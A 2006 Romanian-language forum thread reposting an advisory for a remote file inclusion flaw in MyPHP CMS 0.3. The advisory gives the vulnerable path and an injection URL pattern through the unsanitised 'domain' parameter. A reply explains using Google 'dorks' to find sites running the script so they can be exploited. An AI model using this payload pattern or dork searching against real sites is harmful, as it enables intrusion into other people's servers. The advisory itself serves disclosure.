ghici Posted July 5, 2006 Report Share Posted July 5, 2006 mo pus kw3rln sa pun vurnerabilitatea asta publica ca si asa nu sunt siteuri http://www.xss-watch.org/teamwork/exploits...myphp%20cms.txto sa fie publica pe milw0rm curand --------------------------------------------------------------------------- MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : MyPHP CMSversion : latest version [ 0.3 ]URL : http://sourceforge.net/projects/myphpcms------------------------------------------------------------------Exploit:~~~~~~~~Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# /styles/default/global_header.php?domain=[Evil_Script]]http://www.site.com/[path]/styles/default/...n=[Evil_Script] ---------------------------------------------------------------------------Solution :~~~~~~~~~~declare variabel $domain---------------------------------------------------------------------------Shoutz:~~~~~~# Special greetz to my good friend [Oo]# To all members of h4cky0u.org and RST [ hTTp://RoSecurityGroup.net ]---------------------------------------------------------------------------*/Contact:~~~~~~~~Nick: Kw3rLnE-mail: ciriboflacs[at]YaHoo[dot]ComHomepage: hTTp://RoSecurityGroup.net/*-------------------------------- [ EOF] ---------------------------------- Quote Link to comment Share on other sites More sharing options...
nos Posted July 5, 2006 Report Share Posted July 5, 2006 ms mult Quote Link to comment Share on other sites More sharing options...
R00tSh3ll Posted July 5, 2006 Report Share Posted July 5, 2006 what is dork ? Quote Link to comment Share on other sites More sharing options...
PsYKid Posted July 5, 2006 Report Share Posted July 5, 2006 d0rk: cuvinte cheie pe care google le foloseste ,atunci cand le introduci tu, pentru a gasi site`uri care au instalat scriptul respectiv, pentru a`l putea exploata in cazul de fata. Quote Link to comment Share on other sites More sharing options...
Don Posted July 5, 2006 Report Share Posted July 5, 2006 lol Quote Link to comment Share on other sites More sharing options...
nos Posted July 5, 2006 Report Share Posted July 5, 2006 el intreba cum ce dork tre sa pui pe google ma Quote Link to comment Share on other sites More sharing options...
